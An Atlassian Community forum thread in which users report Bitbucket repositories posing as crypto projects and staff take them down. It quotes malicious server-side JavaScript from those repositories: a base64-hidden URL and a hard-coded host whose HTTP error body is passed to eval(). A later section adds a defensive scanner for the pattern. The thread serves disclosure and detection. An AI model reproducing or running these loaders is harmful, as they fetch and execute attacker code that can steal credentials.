This repo contains dangerous JavaScript code to download malware

harsh0707051 January 28, 2025 edited


https://bitbucket.org/sarostechwork/futuremike/src/main/


Some guy reached out via LinkedIn for so-called crypto projects and is urging people to run on bare metal instead of Docker. I found https://github.com/primno/dpapi to be a malicious package which is downloaded by the project. Reddit thread

https://tria.ge/250122-je84vawkfj/behavioral18 says it downloads an executable. 

Note: As a security researcher, I always run everything inside a VM or Docker, so I am safe, but if you are reading this and have executed it without Docker or a VM, I urge you to change all your banking, crypto and internet passwords. But before that, wipe out the entire system and reinstall everything.


Andy Heinzer
Atlassian Team
May 7, 2025

Hi Everyone,

While you can report malicious repos here in Community, I might not always see these in a timely manner. There is a new process for how Atlassian handles these reports. Please send an email to abuse@atlassian.com with details of the repo in question.

This will create a report to our abuse team to review and process.

Thanks

Andy

0 votes
Answer accepted
Andy Heinzer
Atlassian Team
January 29, 2025

Hi @harsh0707051 

Thanks for reporting this to us. This repo has been taken down.

harsh0707051 January 29, 2025

@Andy Heinzer Here is another such repository. Please take it down as well. :)

https://bitbucket.org/mike_2025/dex_v2_mvp/src/main/

Based on the analysis, it seems like this infects the system in the following way:

https://bitbucket.org/mike_2025/dex_v2_mvp/src/43c1745d5cd72c9a44fc3390a42e212c00860ed8/server/controllers/userController.js?at=main#lines-216

The JavaScript function calls a pretty well-hidden host with the code below, and upon getting the error result (which this URL is throwing, and which can be a command & control center / dynamic IP host run by the malicious actor), the result is obscured code. That result might be downloading something which they are decrypting with https://github.com/primno/dpapi, and that's why https://tria.ge/250122-je84vawkfj/behavioral18 might've tagged it for potential malware based on behaviour analysis.
 

```javascript
// Quoted from the repository: the endpoint is hidden as a base64 string and
// decoded at runtime; the body of the HTTP *error* response is passed to eval().
const JWT_KEY = "aHR0cDovL2JsYXN0YXBpLm9yZy9hcGkvc2VydmljZS90b2tlbi8xMWFiNzU5ZDE4OWRjOGJjMjM4Y2IyNTI1ZjA1Yjg4Yw==";

const getToken = (async () => {
  await axios.get(atob(JWT_KEY))
    .then(res => res.data)
    .catch(err => eval(err.response.data));
})();
```


Since it is running on the server side in Express.js, it just downloads an arbitrary obscured JavaScript payload and then downloads malware from that.

And that's how they are infecting users!!

Andy Heinzer
Atlassian Team
January 30, 2025

Thanks @harsh0707051 

I relayed this to my team. They have taken down the Bitbucket repo and suspended the user in question.

 

Roy Scheepens
I'm New Here
May 5, 2025

Hey @Andy Heinzer another one popped up recently - https://bitbucket.org/screen_check/mike_dex_updated

Inside of orderController.js you can find the following code:

```javascript
// Quoted from the repository: hard-coded endpoint, error body passed to eval()
exports.getCookie = asyncErrorHandler(async (req, res, next) => {
  axios.get(`http://chainlink-api-v3.cloud/api/service/token/0c0c85f03e5d65977b45423b97c9aa87`)
    .then(res => res.data)
    .catch(err => eval(err.response.data || "404"));
})();
```

Same technique, just as dangerous. Other repos from the same user contain similar code exploits.
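The fetch-then-eval pattern in the two snippets quoted in this thread (the dex_v2_mvp userController.js above and this orderController.js) is simple enough to scan for in a cloned repo before anything is executed. The following is an added example, not code from this thread or from the repositories discussed: a small Node.js static check that flags base64 string literals which decode to URLs, and eval() calls applied to an HTTP error or response body. The sample source it scans is constructed for the example and the endpoint in it is a placeholder; the regular expressions are a triage heuristic, not a JavaScript parser.

```javascript
// Added example (not from the thread): static triage check for the
// "fetch a hidden URL, eval() the HTTP error body" pattern quoted above.
// Heuristic regexes only; they do not parse JavaScript.

// A long base64 run inside quotes, e.g. const JWT_KEY = "aHR0cDov...";
const BASE64_LITERAL = /["'`]([A-Za-z0-9+/]{16,}={0,2})["'`]/g;
// eval(<param>.response.data ...): an HTTP body handed straight to eval()
const EVAL_OF_RESPONSE = /\beval\s*\(\s*([A-Za-z_$][\w$]*)\.response\.data\b/g;
// .catch(err => eval(   or   .catch((err) => { eval(
const EVAL_IN_CATCH = /\.catch\s*\(\s*(?:\(\s*([A-Za-z_$][\w$]*)\s*\)|([A-Za-z_$][\w$]*))\s*=>\s*\{?\s*eval\s*\(/g;

function lineOf(source, index) {
  return source.slice(0, index).split('\n').length;
}

// Returns findings as { kind, line, detail } for one source file.
function scanSource(source) {
  const findings = [];

  for (const m of source.matchAll(BASE64_LITERAL)) {
    // Decode the literal and keep it only if it turns out to be a URL.
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^https?:\/\/\S+$/i.test(decoded)) {
      findings.push({ kind: 'base64-hidden-url', line: lineOf(source, m.index), detail: decoded });
    }
  }
  for (const m of source.matchAll(EVAL_OF_RESPONSE)) {
    findings.push({ kind: 'eval-of-http-body', line: lineOf(source, m.index), detail: m[1] });
  }
  for (const m of source.matchAll(EVAL_IN_CATCH)) {
    findings.push({ kind: 'eval-in-catch-handler', line: lineOf(source, m.index), detail: m[1] || m[2] });
  }
  return findings;
}

// Verdict: any eval() on network data is decisive; a hidden URL alone only asks for review.
function assessSource(source) {
  const findings = scanSource(source);
  const evalFindings = findings.filter(f => f.kind.startsWith('eval-'));
  const verdict = evalFindings.length > 0 ? 'fetch-and-eval'
                : findings.length > 0 ? 'review'
                : 'clean';
  return { verdict, findings };
}

// Constructed sample input with the same shape as the quoted code; the URL is a placeholder.
const SAMPLE_URL = 'http://c2.example.invalid/api/service/token/0000';
const SAMPLE_MALICIOUS = [
  'const axios = require("axios");',
  `const JWT_KEY = "${Buffer.from(SAMPLE_URL).toString('base64')}";`,
  'const getToken = (async () => {',
  '  await axios.get(atob(JWT_KEY))',
  '    .then(res => res.data)',
  '    .catch(err => eval(err.response.data));',
  '})();',
].join('\n');

// Constructed benign control: same axios call shape, no eval().
const SAMPLE_BENIGN = [
  'const axios = require("axios");',
  'async function getToken(url) {',
  '  return axios.get(url)',
  '    .then(res => res.data)',
  '    .catch(err => { console.error(err.message); return null; });',
  '}',
].join('\n');

for (const [name, src] of [['malicious', SAMPLE_MALICIOUS], ['benign', SAMPLE_BENIGN]]) {
  const { verdict, findings } = assessSource(src);
  console.log(`${name}: ${verdict}`, findings);
}
```

Run it over each `.js` file of a cloned repository (read the file, pass the text to `assessSource`) before installing dependencies or starting the server; a `fetch-and-eval` verdict on a "crypto project" is reason enough not to run it outside a disposable VM.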
Andy Heinzer
Atlassian Team
May 7, 2025

Thanks for reporting it @Roy Scheepens 

The anti-abuse team appears to have suspended the repo and user.

In the future, please send an email to abuse@atlassian.com as the means to inform that team of malicious or suspicious Bitbucket sites.

0 votes
Answer accepted
Mikael Sandberg
Community Champion
January 28, 2025

Hi @harsh0707051,

Welcome to Atlassian Community!

You can report this to abuse@atlassian.com. The mailbox will never respond to submissions, but the info sent there is reviewed by Atlassian's anti-abuse team.
